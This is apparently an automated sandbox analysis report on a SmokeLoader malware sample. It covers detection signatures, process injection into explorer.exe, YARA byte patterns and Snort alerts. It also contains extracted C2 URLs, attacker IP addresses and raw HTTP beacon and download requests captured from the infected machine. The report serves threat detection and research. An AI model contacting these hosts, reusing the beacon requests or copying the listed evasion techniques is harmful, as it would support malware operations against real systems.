Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:719838
MD5:28167cbfd672c0fc70358d19de3826eb
SHA1:92112f7c9a68e28d86c3762871525647f55bb337
SHA256:86533589ed7705b7bb28f85f19e45d9519023bcc53422f33d13b6023bab7ab21
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 712 cmdline: C:\Users\user\Desktop\file.exe MD5: 28167CBFD672C0FC70358D19DE3826EB)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 586.exe (PID: 1792 cmdline: C:\Users\user\AppData\Local\Temp\586.exe MD5: 5C3FAFBD0E6546D41F902B129CE27E7B)
  • ichffhi (PID: 1044 cmdline: C:\Users\user\AppData\Roaming\ichffhi MD5: 28167CBFD672C0FC70358D19DE3826EB)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://citnet.ru/tmp/", "http://ekcentric.com/tmp/", "http://cracker.biz/tmp/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x3a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x7a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x4da7:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 9 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.5123.213.233.19449727802039103 10/10/22-23:21:43.610588
      SID:2039103
      Source Port:49727
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949725802851815 10/10/22-23:21:40.937240
      SID:2851815
      Source Port:49725
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12649719802039103 10/10/22-23:21:33.465965
      SID:2039103
      Source Port:49719
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449707802039103 10/10/22-23:21:16.044111
      SID:2039103
      Source Port:49707
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449708802851815 10/10/22-23:21:17.650942
      SID:2851815
      Source Port:49708
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449710802851815 10/10/22-23:21:20.622915
      SID:2851815
      Source Port:49710
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449712802039103 10/10/22-23:21:22.834033
      SID:2039103
      Source Port:49712
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949715802039103 10/10/22-23:21:27.468192
      SID:2039103
      Source Port:49715
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949718802039103 10/10/22-23:21:31.972645
      SID:2039103
      Source Port:49718
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449696802039103 10/10/22-23:20:42.553354
      SID:2039103
      Source Port:49696
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5195.158.3.16249697802851815 10/10/22-23:20:43.995908
      SID:2851815
      Source Port:49697
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12649701802039103 10/10/22-23:20:48.233145
      SID:2039103
      Source Port:49701
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449706802039103 10/10/22-23:21:14.135349
      SID:2039103
      Source Port:49706
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449721802039103 10/10/22-23:21:36.299575
      SID:2039103
      Source Port:49721
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449698802039103 10/10/22-23:20:44.841478
      SID:2039103
      Source Port:49698
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12649700802851815 10/10/22-23:20:46.940023
      SID:2851815
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449703802039103 10/10/22-23:20:51.020309
      SID:2039103
      Source Port:49703
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5185.95.186.5849705802039103 10/10/22-23:21:13.333100
      SID:2039103
      Source Port:49705
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5195.158.3.16249724802039103 10/10/22-23:21:40.109589
      SID:2039103
      Source Port:49724
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5195.158.3.16249699802039103 10/10/22-23:20:45.875779
      SID:2039103
      Source Port:49699
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449726802039103 10/10/22-23:21:42.125679
      SID:2039103
      Source Port:49726
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5109.102.255.23049720802039103 10/10/22-23:21:35.785955
      SID:2039103
      Source Port:49720
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949729802039103 10/10/22-23:21:46.586226
      SID:2039103
      Source Port:49729
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949702802851815 10/10/22-23:20:49.530167
      SID:2851815
      Source Port:49702
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5185.95.186.5849731802851815 10/10/22-23:21:49.526122
      SID:2851815
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449708802039103 10/10/22-23:21:17.650942
      SID:2039103
      Source Port:49708
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449712802851815 10/10/22-23:21:22.834033
      SID:2851815
      Source Port:49712
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12649700802039103 10/10/22-23:20:46.940023
      SID:2039103
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949702802039103 10/10/22-23:20:49.530167
      SID:2039103
      Source Port:49702
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949717802039103 10/10/22-23:21:30.478796
      SID:2039103
      Source Port:49717
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449728802039103 10/10/22-23:21:45.102166
      SID:2039103
      Source Port:49728
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949695802039103 10/10/22-23:20:40.724773
      SID:2039103
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12949723802039103 10/10/22-23:21:38.968161
      SID:2039103
      Source Port:49723
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5185.95.186.5849731802039103 10/10/22-23:21:49.526122
      SID:2039103
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449713802039103 10/10/22-23:21:24.328396
      SID:2039103
      Source Port:49713
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449716802039103 10/10/22-23:21:28.975450
      SID:2039103
      Source Port:49716
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5175.120.254.949725802039103 10/10/22-23:21:40.937240
      SID:2039103
      Source Port:49725
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449721802851815 10/10/22-23:21:36.299575
      SID:2851815
      Source Port:49721
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449709802039103 10/10/22-23:21:19.131381
      SID:2039103
      Source Port:49709
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449722802039103 10/10/22-23:21:37.493453
      SID:2039103
      Source Port:49722
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5211.171.233.12949714802039103 10/10/22-23:21:26.167962
      SID:2039103
      Source Port:49714
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5195.158.3.16249697802039103 10/10/22-23:20:43.995908
      SID:2039103
      Source Port:49697
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449703802851815 10/10/22-23:20:51.020309
      SID:2851815
      Source Port:49703
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.5123.213.233.19449710802039103 10/10/22-23:21:20.622915
      SID:2039103
      Source Port:49710
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: file.exeReversingLabs: Detection: 43%
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\ichffhiReversingLabs: Detection: 43%
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\ichffhiJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\586.exeJoe Sandbox ML: detected
      Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://citnet.ru/tmp/", "http://ekcentric.com/tmp/", "http://cracker.biz/tmp/"]}
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 87.250.250.50:443 -> 192.168.2.5:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49730 version: TLS 1.2
      Source: Binary string: C:\fuw\riboz.pdb source: 586.exe, 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr
      Source: Binary string: C:\tuvapehib\puvomufewade\sehem\jizef.pdb source: file.exe, ichffhi.1.dr
      Source: Binary string: s_C:\fuw\riboz.pdb source: 586.exe, 00000006.00000000.556358879.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe, 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, 586.exe.1.dr

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
      Source: C:\Windows\explorer.exeNetwork Connect: 213.227.155.16 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: gayworld.at
      Source: C:\Windows\explorer.exeDomain query: disk.yandex.ru
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49695 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49696 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49697 -> 195.158.3.162:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49697 -> 195.158.3.162:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49698 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49699 -> 195.158.3.162:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49700 -> 211.171.233.126:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49700 -> 211.171.233.126:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49701 -> 211.171.233.126:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49702 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49702 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49703 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49703 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49705 -> 185.95.186.58:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49706 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49707 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49708 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49708 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49709 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49710 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49710 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49712 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 211.171.233.129:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49717 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 211.171.233.126:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 109.102.255.230:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49721 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 211.171.233.129:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49724 -> 195.158.3.162:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49725 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49725 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49726 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49727 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49728 -> 123.213.233.194:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49729 -> 175.120.254.9:80
      Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49731 -> 185.95.186.58:80
      Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 185.95.186.58:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: http://citnet.ru/tmp/
      Source: Malware configuration extractorURLs: http://ekcentric.com/tmp/
      Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
      Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox ViewASN Name: RTDBucharestRomaniaRO RTDBucharestRomaniaRO
      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox ViewIP Address: 123.213.233.194 123.213.233.194
      Source: global trafficHTTP traffic detected: GET /d/aS1IzKYGKL0Ctw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: disk.yandex.ru
      Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqhcrffxeq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bflbsmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqvxwnkwk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqmaakrhx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhmlysw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lgjjdpyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymxif.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjwailraw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbrskgx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajrrmv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejnrvuf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edudewfeyy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yabmhcrfhk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksluvey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vkbntx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qgfdim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hepvmeebid.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biqudpj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjcuybim.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xyeynuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aaidrfo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhgat.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tusjn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cprumtbxh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: gayworld.at
      Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhuni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: gayworld.at
